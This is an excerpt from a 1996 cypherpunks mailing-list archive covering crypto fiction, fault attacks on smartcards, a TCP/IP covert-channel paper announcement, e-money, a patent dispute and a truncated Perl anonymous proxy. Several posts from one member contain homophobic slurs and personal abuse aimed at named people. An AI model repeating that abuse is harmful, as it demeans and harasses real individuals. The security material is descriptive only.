At 9:09 pm -0500 11/20/96, Hal Finney wrote:
>What fiction can people recommend which presents crypto/privacy issues
>realistically?  How about this new book that Neal Stephenson is working
>on, does anyone know what it's about?  His short story, "Hack the Spew",
>a few months ago (in Wired, I think?) had a strong crypto flavor.

His, "Great Samolean Caper" for Time/Pathfinder was pure cryptoanarchy...

I don't know if it's still around though.

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 20 Nov 1996 16:09:30 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Innocent until proven guilty
In-Reply-To: <v03007800aeb8f3907bb2@[207.167.93.63]>
Message-ID: <Pine.LNX.3.94.961121000623.6099A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 20 Nov 1996, Timothy C. May wrote:

> At 1:36 AM -0600 11/20/96, snow wrote:
> >> At 01:02 =EC=EC 19/11/1996 -0500, Clay Olbon II wrote:
> >> >with _serious_ issues of 'unemployability'., FURTHERMORE people are NEVER
> >> >guilty before PROVEN so. Guilt or Innocence is NOT a matter of 'opinion',
> >
> >    Huh? People are most certainly guilty before "proven" so, the government
> >just isn't allowed to _assume_ their guilt, or to _act_ like they are guilty.
> >
> >     If you purchase LSD in America, you are guilty of a felony--Drug
> >trafficing. Wether the court _finds_ you guilty or not is another story.
> 
> In this case, the putative crime is "drug trafficking" or "possession,"
> depending. One is still presumed innocent until proven guilty. To wit, the
> state must prove its case.
> 
> I rather suspect that any prosecutors or defense lawyers on this list will
> confirm that an LSD case is hardly a case of "guilty until proven innocent."
> 

Whether you're _presumed_ innocent or not isn't the point he was making.
If you commit a crime, you are guilty of that crime, proven or not.  You
might not be _proven guilty_ in court, which you have to be in order to be
convicted, and you are still _presumed_ innocent.  But you're still guilty
of the crime.

 --Deviant
Talking much about oneself can also be a means to conceal oneself.
		-- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMpOdcTCdEh3oIPAVAQGICgf+Nblm9lfworbBpqHp1xqnKKBqJj9EZNIA
W17r/RY7TcYJmsVZY3h5jwShvdyZt+Ou04TrQK7t9ZjPqgYyWd5y/P0+tg71dCZn
C/H1IVMLLFn3LR8noXMDznV4NSK0edlYvkgha2DeJGFVpQ2vMg+ck911/oLM3jFK
t7guwVc4/lDahQXtm03/SwBT3H8e7Np74k7X8k2Zge3wbJoqTiLnykTQOKIuAC9Q
+CqJPBoUSkIaYYbn+S5ZCFjNRvwJyGAiEqLeghVY/fRB1ufZT8m7/0wHsmQJPULS
B7mNRZqtYUwGABmfZ5OzlyDag+DFSD56/xhaB3977c8APOVU5sj0Yg==
=Zwdy
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 20 Nov 1996 21:09:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Anderson & Kuhn's "Improved DFA" paper
Message-ID: <1.5.4.32.19961121080842.003dcb34@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


HP just announced their big new plans for international exportable crypto
using tamperproof PCM-CIA smartcards with multiple tamperproof GAK plugins.
Anderson&Kuhn just announced the latest in a series of attacks on 
"tamperproof" hardware crypto modules by Israeli, UK, and US cryptographers.
Obviously it must be a conspiracy :-)

It's also an opportunity for some well-timed press releases.
Clipper 1's reputation was severely damaged by Matt's attack.
Anybody know if HP's giving out samples, and if there are real or test
GAK plugins for them?

HP URL http://www.dmo.hp.com/gsy/security/icf/main.html

The paper was posted to coderpunks, and it's on 
        ftp://ftp.cl.cam.ac.uk/users/rja14/dfa
Here's the intro:
---------------------------------------------------------------------
                   Improved Differential Fault Analysis

                      Ross J Anderson, Markus G Kuhn

In [1], Biham and Shamir announce an attack on DES based on 200 ciphertexts 
in which one-bit errors have been induced by environmental stress. 
Here we show an attack that requires less than ten ciphertexts. 
Furthermore, our attack is practical in that it uses a fault model that 
has been implemented in attacks on real smartcards.

In [2], Biham and Shamir show how their method can be extended to reverse
engineer algorithms whose structure is unknown.  Our attack can also be 
extended to such cases and is more efficient there too. 
In [3], Boneh, De Millo and Lipton discuss how such techniques can be used
to attack RSA. Again, their attack is theoretical only, 
We show how to do it in practice.

--------------------------------------------------------------------------

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
#     (If this is posted to cypherpunks, I'm currently lurking from fcpunx,
#     so please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 21 Nov 1996 00:10:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why I Don't Read SF Much Anymore
In-Reply-To: <199611210649.WAA11903@netcom6.netcom.com>
Message-ID: <v03007800aeb9ba1d385e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



On the issue of why many of us don't read as much SF as we once did...

Speaking for myself,

1. I'm a lot older. The stuff that I thought was really great back when I
was 14-22, or so, and even "pretty good" until I was about 25 or so, now
really looks like dreck. (Not all of it, but more than I thought was dreck
at the time.)

Partly this is age and life experience, partly just increased sophistication.

2. As Duncan noted, helping make the future tends to make fantasies about
the future less compelling.

I often found my work at Intel in the 1970s and into the 80s to be much
more exciting, and much more "science fictionish" than nearly anything I
read in SF. And the same is largely true of recent years. Even the most
interesting of modern SF writers--Vinge, Stephenson, Sterling--are
explicitly using crypto and Cypherpunk themes.

(Vernor V. claimed to a friend of mine that the day he spent talking to
several of us was the most fruitful day he'd spent in a long time...I take
this as evidence that folks like us are to the new generation of SF writers
what folks like members of the British Interplanetary Society were to
writers of past generations.)

3. Some of the best stuff written today is, in my opinion, as well-written
as anything in the past. Some stuff I've liked in recent years:

- Dan Simmons, "Hyperion," and "Hyperion Rising." Very creative, very
literate, very absorbing, and a plausible future. Some cyberpunk themes as
well, but mixed in with several other styles.

(Interestingly, Eric Drexler says he cannot enjoy it because Simmons does
not give nanotechnology a central enough role. This echoes the point Duncan
made, that our personal visions of the future make us less tolerant of
futures which don't match our visions closely enough. And as we get older,
our visions solidify. We become more opinionated, and less "open-minded.")

- David Zindell, "Neverness," "The Broken God," and a third novel in the
series. Less known than Simmons, but well worth checking out.

- Vernor Vinge, "True Names," obviously, "The Peace War," "Marooned in Real
Time," "A Fire Upon the Deep," and his collections of short stories (incl.
"The Ungoverned").

(Caveat: I've been invited to do a chapter for Vinge's forthcoming "True
Names" book, containing essays about computers and society, and, of course,
his novella of the same name. So I may be biased.)

- John Brunner, "The Shockwave Rider," and, my favorite, "Stand on
Zanzibar." Required reading. As Shalmaneser would put it, "Christ, what an
imagination he had."

- Orson Scott Card, "Ender's Game." A good fictional exploration of online
anony mity. In many ways, Cypherpunks was explicity a kind of combination
of "Ender's Game," "True Names," "The Shockwave Rider," and "Atlas
Shrugged."

- Gibson, Stephenson, Fred Pohl, etc.

- and of course Heinlein, though his best stuff is 30-45 years old now

Fortunately, there's a vast amount of stuff to read even if SF is becoming
somewhat worn out.

(Another trend not mentioned yet is that the "science fiction" category is
actually largely made up of "fantasy" and related themes. Readers are buyng
the stuff, so it's hard to argue with it. I don't read it, except for the
occasional fantasy classic (a la Tolkien)...it never spoke to me, and it
never seemed "useful" to me. By "useful" I refer to the fact that when I
was a kid I read SF for tips and motivation, for my chosen field, physics.
The stuff I read, such as Heinlein's novels, truly did speak to me.)

Finally, I could say I have "less time" than when I was younger. Though it
seems this way, it objectively is not the case. When I was a kid I _made_
the time to read a lot. Of course, now my reading and writing is
online--and I'm doing a lot more writing than I did when I was devouring an
SF novel every evening, on average.

--Tim May



Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 21 Nov 1996 00:15:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Better ways to spy
In-Reply-To: <19961121033534640.AAA222@rn244.io-online.com>
Message-ID: <v03007801aeb9c03fa937@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:37 PM -0700 11/20/96, Adamsc wrote:

>What will get mentioned, however, will be: "If he'd been using PGP we'd
>never have caught him.  This is why we need GAK!"
>

Or the more positive way of looking at things:

"If he had been using digital dead drops instead of old-fashioned
postcards, and if he'd been using more sophisticated money management
schemes instead of simple deposits after trips to Europe, he might not have
been caught."

(By the way, it's the dumb and/or careless ones who get caught. I surmise
that for every one caught, an average of two are still spying. And they
probably _are_ wiping their hard drives more carefully, probably _are_
using digital dead drops (a la message pools), and probably _are_ having
their fees wired directly to their offshore accounts.)


--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 20 Nov 1996 21:24:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: BIS E-money Report
Message-ID: <1.5.4.32.19961121052143.00699534@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to IG, we've put a copy of the BIS report on E-money at:

   http://jya.com/bis_emoney.html

Here's a blurb from the intro:

Implications for Central Banks of the Development of Electronic
Money

October 1996

Since the end of 1995 the central banks of the Group of Ten (G-10) 
countries have been studying the development of electronic money 
and the various policy issues which it raises. Much of this work 
has been carried out by the Committee on Payment and Settlement 
Systems (CPSS) or by monetary policy experts from G-10 central 
banks. Electronic money was discussed by BIS member central banks 
at meetings in Basle in July and September 1996. In August, the 
BIS published a report on the Security of Electronic Money 
prepared by the CPSS and the Group of Computer Experts.

This report provides a definition of electronic money and a 
description of its key features. It discusses the factors influencing 
the development of e-money products. Finally, it reviews the policy 
issues raised by e-money developments, as seen from a central bank 
perspective, and discusses the possible policy responses.

--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig H. Rowland" <crowland@psionic.com>
Date: Wed, 20 Nov 1996 21:29:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: New Paper: Covert Channels in the TCP/IP Protocol Suite
Message-ID: <3293E87A.469FB11D@psionic.com>
MIME-Version: 1.0
Content-Type: text/plain


All,

I have released a new paper entitled: 

Covert Channels in the TCP/IP Protocol Suite

This paper demonstrates several methods of encoding secret data into the
headers of the TCP/IP protocol. Main topics of interest include:

- Encoding data into IP headers.
- Encoding data into TCP headers.

Specific areas of focus allow encoding of data into the IP
identification fields and TCP sequence number fields for clandestine
transmission of data to a remote host. Packets of data appear normal to
network sniffers and packet filters, yet can contain hidden messages in
either plaintext or ciphertext.

Other methods revealed include a new technique where forged packets can
be "bounced" off any Internet connected site to establish a
communication path that appears to originate from the "bounced" host. 
Additionally, several methods are discussed regarding bypassing of
packet filters with encoded data for communication with hosts inside a
protected network.

This paper contains actual demonstrations as well as source code for
Linux 2.x systems to allow encoded transmissions between sites to be
tested.

If you are interested in reading this paper, please visit my website:

http://www.psionic.com/papers.html

This site has VERY limited bandwidth so please be patient if it is slow.

Thank you for your time..

-- Craig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 20 Nov 1996 22:07:33 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Anon
In-Reply-To: <Dw3PXD33w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.94.961121010553.4194G-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Date: Wed, 20 Nov 96 21:46:36 EST
> From: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
> To: cypherpunks@toad.com
> Subject: Re: Anon
> 
> rod@wired.com (Roderick Simpson) writes:
> 
> > Who has made the strongest case _against_ anonymity on the Net that you
> > have ever heard? Someone intelligent and theoretical rather than trapped in
> > some child porn or commerce pov.
> 
> Cypherpunks themselves are opposed to complete anonymity. They insist on
> being able to track down and silence whoever (ab)uses the remailers to
> distribute homophobic or otherwise politically incorrect traffic. Just
> search the archives for their advocacy of "identify escrow".

Actually, this is false.

We (if I may speak for "us") don't care who the spamer is, as long as they
shut up.

> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cbg <cbg@wwa.com>
Date: Wed, 20 Nov 1996 23:20:59 -0800 (PST)
To: "lyalc@cba.com.au>
Subject: Re: NT insecurity
In-Reply-To: <32919A95.159E@mail.cba.com.au>
Message-ID: <Pine.BSD.3.92.961121011909.24974B-100000@shoga.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 19 Nov 1996, lyalc@mail.cba.com.au wrote:

> Justin Robbins wrote:
> >
> > Well, for those uninformed out there who believe that you can
> > penetrate an NT box using NTFSDOS, the problem remains that security
> > in windows NT is a combination between the filesystem NTFS and the
> > actual operating system, NT. NTFSDOS only allows reading the drives,
> > not writing to them. NT also keeps the security registry
>
> I guess Norton Utilities for DOS don't work if you have NTFSDOS loaded,
> then.
>

no... from what I read.... NT's security features only work on NTFS
formated drives... if you where to run it on a drive with a FAT partition
then you wouldn't get to use any of it's security features

cbg





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pclow <pclow@extol.com.my>
Date: Tue, 19 Nov 1996 18:01:33 -0800 (PST)
To: aga <paul@fatmans.demon.co.uk>
Subject: RE: [NOISE] aga isn't on cypherpunks... (and I'm glad)
Message-ID: <96Nov20.181004gmt+0800.21889@portal.extol.com.my>
MIME-Version: 1.0
Content-Type: text/plain


> 
> That is your last warning, Mike.  If you start harasing my postmaster,
> I will have your fucking ass in Federal Court before you can blink.

Errrr..... what has Paul's oversexed donkey got to do with this list or the Federal
Court? Sorry, I'm not in the US and my knowledge of US culture is very limited.

----------
From: 	paul@fatmans.demon.co.uk[SMTP:paul@fatmans.demon.co.uk]
Sent: 	Monday, November 18, 1996 11:58 PM
To: 	aga
Cc: 	cypherpunks@toad.com
Subject: 	Re: [NOISE] aga isn't on cypherpunks... (and I'm glad)


> 
> That is your last warning, Mike.  If you start harasing my postmaster,
> I will have your fucking ass in Federal Court before you can blink.
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan.Pugh@MCI.Com>
Date: Thu, 21 Nov 1996 03:07:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Patent Fight Could Add to Cost of Inter
In-Reply-To: <42961121063424/0003701548ND1EM@MCIMAIL.COM>
Message-ID: <Chameleon.848574420.apugh@tx86-8>
MIME-Version: 1.0
Content-Type: text/plain



By KATHLEEN SAMPEY 
Associated Press Writer 

NEW YORK (AP) _ A little-known patent could raise the cost of 
doing business over the Internet for companies selling software, 
video or other digital products delivered online. 

E-Data Corp. of Secaucus, N.J., is suing 17 companies, including 
McGraw-Hill and CompuServe, to collect licensing fees on the 
patent, which protects downloading of encrypted digital 
information. A court hearing is scheduled Dec. 6 in New York on the 
company's claims. 

Analysts said the patent will not significantly restrain 
Internet commerce, but would raise the cost of doing business on 
the Internet and cause headaches for small start-up companies. 

Some companies, including Adobe Systems and VocalTec, have 
grudgingly paid the licensing fee. Others intend to fight it. 

``We believe it's important to draw a line in the sand and make 
them prove infringement,'' said CompuServe spokeswoman Gail 
Whitcomb. ``We think their claim is way too broad.'' 

Arnold Freilich, E-Data's president, said the company bought 
rights to the patent in 1994. He won't disclose how much the 
company has made from it, but said it covers digital products such 
as text, software, images, music and video transmitted through 
phone lines to customers. 

Companies that take orders for products over the Internet, then 
ship them by mail would not be affected. 

The patent was first issued in 1985 to Charles Freeny Jr. 

Freeny, an electrical engineer, held the digital encryption 
patent until 1989. Unable to make money on it, he sold it for about 
$100,000 to a company called Avedas Corp. 

``I didn't foresee the Internet,'' he said. 

Avedas couldn't make money from it either and has since gone out 
of business. 

By 1994, when E-Data bought the patent for $290,000, the World 
Wide Web had come of age, and so had the possibility of enforcing 
the patent, which expires in 2003. 

Peter Tracy remembers making the acquaintance of U.S. Patent No. 

4,528,643. 

His East Haven, Conn.-based company, MicroPatent, operates a Web 
site where users can search and download patent and trademark 
information for 25 cents a page. 

On March 22, he received a packet from E-Data saying his company 
might be infringing on the patent. He could either pay a fee based 
on the percentage of his Web site profits, or be sued. 

``I felt like I had been sucked into (a) bottomless pit,'' he 
said. 

MicroPatent agreed to pay the licensing fee, which Tracy will 
not disclose. 

The cost of the annual fees range from 1 percent to 5 percent of 
sales under $1 million, according to David Fink, E-Data's attorney. 
For sales over $1 million, the rate is determined on an individual 
basis, he said. 

Several cases already have been dismissed because either 
defendants paid the fees or they were found not to be in violation, 
he said. Cases against Dun & Bradstreet, Decision Support and Meca 
Software were dismissed. Company representatives either could not 
be reached or refused comment. 

IBM spokesman Fred McNeese declined comment on questions about 
E-Data or the licensing fees. 

But companies such as McGraw-Hill are anticipating the December 
court hearing. 

``We fail to see anything that we do in our businesses that 
infringes on this patent,'' said McGraw-Hill spokesman Steven 
Weiss. ``We've asked them continually what we've been doing, and 
E-Data has not told us _ aside from accusing us. 

``We have no plans to pay them anything,'' he said. 

But Freilich said the patent is specific in its description of 
encrypted digital data, which is how many companies have sold such 
information since 1994. 

For example, a customer orders a digital product over the 
Internet, and pays for it through the Internet with a credit card. 
These types of transactions are not all that new, as in 
CompuServe's case. 

But once the product has been downloaded to the customer's 
terminal, an encryption code is provided by the seller to unlock 
the encryption, thereby allowing the customer to use the product. 
It is this added step that Freilich said the patent describes. 

Today's network organization also makes the patent enforceable, 
he said. In 1985 when the patent was granted, there was no such 

thing as an addressable computer or the Web. 

``The technology has brought us to the point where anyone's 
computer terminal is addressable, where encryption is commonplace 
and that has led to the enforcement of this patent,'' Freilich 
said. 

Scott Smith, analyst at Jupiter Communications, predicted the 
case would not dampen Web commerce. 

``I think it's a blip on the radar,'' he said. ``It may hurt 
some of the start ups. But larger companies face this kind of thing 
all the time. They'll be able to shake it off.'' 

While some may accuse E-Data of trying to stifle Internet 
commerce, Fink sees his client's efforts merely as a means to cash 
in on a legitimate, far-sighted investment. 

``Besides,'' he said, ``3 cents on the dollar will not put any 
company out of business.'' 

AP-DS-11-19-96 2327EST 

* * * END OF DELIVERY * * * 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Thu, 21 Nov 1996 02:25:06 -0800 (PST)
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Does John Gilmore EAT Asshole?
In-Reply-To: <Pine.BSF.3.91.961120130826.27866B-100000@mcfeely.bsfs.org>
Message-ID: <Pine.LNX.3.95.961121051941.15546B-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Nov 1996, Rabid Wombat wrote:

> Date: Wed, 20 Nov 1996 13:09:17 -0500 (EST)
> From: Rabid Wombat <wombat@mcfeely.bsfs.org>
> To: aga <aga@dhp.com>
> Cc: Black Unicorn <unicorn@schloss.li>, cypherpunks@toad.com
> Subject: Re: Does John Gilmore ?
> 
> 
> Grubby! Back under your rock!
> 

FUCK YOU COCKSUCKER -- as long as you keep writing to be,
I will continue to rip a new asshole in the Faggot John Gilmore
who promotes PUNKs like you.

A 'punk' is a faggot pussy who is really NOT a man!

> On Wed, 20 Nov 1996, aga wrote:
> 
> > Somebody censored the header in this article,
> > and we put it back.  You know, that is the worst
> > kind of censorship, when somebody attempts to avoid the issue.
> 

The faggot Gilmore does take it up the ass and also eat assholes, so
he should be added to the net.scum list at once.

-a





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jim & Carla Rogers" <rogers@cccbbs.com>
Date: Thu, 21 Nov 1996 02:57:57 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Any RC4 attacks?
Message-ID: <199611211057.CAA11922@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Schneier claims that RC4 has not yet fallen to crypanalytic attack. 
Assuming that a sufficient length key is used (>= 128 bits), have there
been any successful attacks?

Jim Rogers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Thu, 21 Nov 1996 02:57:25 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: FUCK YOU punk/was:Taking out the garbage
In-Reply-To: <199611210407.RAA06841@mycroft.actrix.gen.nz>
Message-ID: <Pine.LNX.3.95.961121055159.15546I-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Nov 1996, Paul Foley wrote:

> Date: Thu, 21 Nov 1996 17:07:22 +1300
> From: Paul Foley <mycroft@actrix.gen.nz>
> Reply-To: freedom-knights@jetcafe.org
> To: aga@dhp.com, freedom-knights@jetcafe.org, cypherpunks@toad.com
> Subject: Re: FUCK YOU punk/was:Taking out the garbage
> 
> On Wed, 20 Nov 1996 05:11:47 -0500 (EST), aga <aga@dhp.com> wrote:
> 
>    On Tue, 19 Nov 1996, Dr.Dimitri Vulis KOTM wrote:
>    >
>    > Beginning Monday, 11/25/96, I will bounce all email from the various 
>    > (non-)subscribers polluting this list with garbage back to the 
>    > authors. Furthermore, I will attach documents describing basic 
>    > Internet rules of conduct to each bounce.
>    > 
> 
> First of all, it wasn't Vulis who wrote that, it was Lucky Green.  Try
> to keep your attributions straight.
> 

Nobody attributed it to Vulis, and you can tell from
the ">" that it was not from him.

>    Somebody tell this stupid motherfucker that there are NO "basic
>    Internet rules of conduct."
> 
> Wasn't it you who claimed that cypherpunks was "public domain" because
> of just some such "InterNet" rule?
> 

No; there are no rules.  I used to believe in them,
but not no more.

>    He who tries to make or enforce any rules DIES!
> 
> Is that a rule? :-)
> 

That is reality; "DIES" means that your access is terminated;
it has nothing to do with the actual person, stupid.

>    > I would encourage other Cypherpunks to do the same. 
> 
>    Yeah boy, you are a PUNK allright.
> 
> And you're a hypocritical fascist asshole.  So what?
> 

Anybody who would be satisfied to be called a "punk"
is much less of a man than anything I would ever want
to be.  I challenge the motherfucker to a live 
kick-boxing match on the InterNet.

You see, "punks" have NO BALLS!

> -- 
> Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred
> 
> 	   PGP key ID 0x1CA3386D available from keyservers
>     fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
> ----------------------------------------------------------------------
> I feel like I am sharing a ``CORN-DOG'' with NIKITA KHRUSCHEV ...
> 

What the fuck is somebody from New Zealand doing here anyway?
just go away...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Thu, 21 Nov 1996 06:50:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199611211445.GAA13181@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Nov 1996, aga <aga@dhp.com> wrote: 

From: aga <aga@dhp.com>
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
cc: FREEDOM-KNIGHTS@JETCAFE.ORG, Black Unicorn <unicorn@schloss.li>,
        cypherpunks@toad.com
Subject: Re: Does John Gilmore EAT Asshole?


|FUCK YOU COCKSUCKER -- as long as you keep writing to be,
|I will continue to rip a new asshole in the Faggot John Gilmore
|who promotes PUNKs like you.

[snip]

|A 'punk' is a faggot pussy who is really NOT a man!

|The faggot Gilmore does take it up the ass and also eat assholes, so
|he should be added to the net.scum list at once.



I should'a kill-filed this sicko long ago.

Like the raving individuals one passes on the sidewalk, he is best ignored. Leave him for professional care.

>From whence does such trash arise?

Oh me!!









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 21 Nov 1996 04:07:40 -0800 (PST)
To: roach_s@alph.swosu.edu (Sean Roach)
Subject: Re: 1996 Codebreakers
In-Reply-To: <199611210438.UAA02202@toad.com>
Message-ID: <199611211204.HAA02680@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Sean Roach wrote:
| >Adam Shostack <adam@homeport.org> writes:
| >> 	I just got a review copy of the new (1996) ed. of Kahn's The
| >> Codebreakers from my local used bookstore.  Its a little disapointing,
| >...
| >> & DH.  Nothing on Cypherpunks, little on how privacy can be enhanced.
| The above was stripped from a reply made by Dr Dimitri Vulis.
| 
| I have just one question, was the copy that you purchased hardcopy
| or paperback? 

hardback.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Thu, 21 Nov 1996 06:19:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why I Don't Read SF Much Anymore (fwd)
Message-ID: <m0vQZy8-0000neC@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> Date: Thu, 21 Nov 1996 00:14:49 -0800
> From: "Timothy C. May" <tcmay@got.net>
> Subject: Re: Why I Don't Read SF Much Anymore
> 

[among other things]

> 
> - Vernor Vinge, "True Names," obviously, "The Peace War," "Marooned in Real
> Time," "A Fire Upon the Deep," and his collections of short stories (incl.
> "The Ungoverned").
> 
> (Caveat: I've been invited to do a chapter for Vinge's forthcoming "True
> Names" book, containing essays about computers and society, and, of course,
> his novella of the same name. So I may be biased.)
> 

Is this the St. Martin's Press "True Names" edition that was listed in 
amazon.com? At one time, it was going to be released August or Sept. of this
year.

I have to mention that the owner of Dreamhaven Books here in Minneapolis
complained to me last year that he has a "truckload" of remaindered copies
of "Peace War". They still have a bunch--every time I've been in there, 
there's a hardbound "Peace War" on display with a price tag of $1.00.
Buying a copy of "True Names" right now is about as easy as buying an
original Dead Sea Scroll--but if anybody wants a cheap copy of "Peace War",
look up Dreamhaven in Minneapolis.

--C.G.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 21 Nov 1996 05:26:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: CAVE Table
Message-ID: <1.5.4.32.19961121132426.006aceb4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


For clarity we've replaced the CAVE Table image in TR45.3 
with HTML and ASCII versions.

The tables are also at:  

     http://jya.com/cavetable.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Hamilton <martin@mrrl.lut.ac.uk>
Date: Thu, 21 Nov 1996 00:37:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: anonymous proxy server in 100 lines of Perl (fwd)
Message-ID: <199611210837.IAA15346@gizmo.lut.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I'm sure this could be squeezed onto one line.  Sheesh - comments even! :-)

Martin

------- Forwarded Message

From: Randal Schwartz <merlyn@stonehenge.com>
To: libwww-perl@ics.UCI.EDU
Subject: anonymous proxy server in 100 lines of Perl
Date: 20 Nov 1996 20:21:43 -0700


No cookies.  No referer.  No From.  All we need is a dozen of these
around the planet. :-)

Gisle, thanks.  You truly are "the wizard of aas". :-)

And yes, this is the code for the next Web Techniques magazine column.

#!/home/merlyn/bin/perl -Tw
use strict;
$ENV{PATH} = join ":", qw(/usr/ucb /bin /usr/bin);
$|++;

## Copyright (c) 1996 by Randal L. Schwartz
## This program is free software; you can redistribute it
## and/or modify it under the same terms as Perl itself.

## Anonymous HTTP proxy (handles http:, gopher:, ftp:)
## requires LWP 5.04 or later

my $HOST = "localhost";
my $PORT = "8008";

sub prefix {
  my $now = localtime;

  join "", map { "[$now] [${$}] $_\n" } split /\n/, join "", @_;
}

$SIG{__WARN__} = sub { warn prefix @_ };
$SIG{__DIE__} = sub { die prefix @_ };
$SIG{CLD} = $SIG{CHLD} = sub { wait; };

my $AGENT;			# global user agent (for efficiency)
BEGIN {
  use LWP::UserAgent;

  @MyAgent::ISA = qw(LWP::UserAgent); # set inheritance

  $AGENT = MyAgent->new;
  $AGENT->agent("anon/0.07");
  $AGENT->env_proxy;
}

sub MyAgent::redirect_ok { 0 } # redirects should pass through

{				### MAIN ###
  use HTTP::Daemon;

  my $master = new HTTP::Daemon
    LocalAddr => $HOST, LocalPort => $PORT;
  warn "set your proxy to <URL:", $master->url, ">";
  my $slave;
  &handle_connection($slave) while $slave = $master->accept;
  exit 0;
}				### END MAIN ###

sub handle_connection {
  my $connection = shift;	# HTTP::Daemon::ClientConn

  my $pid = fork;
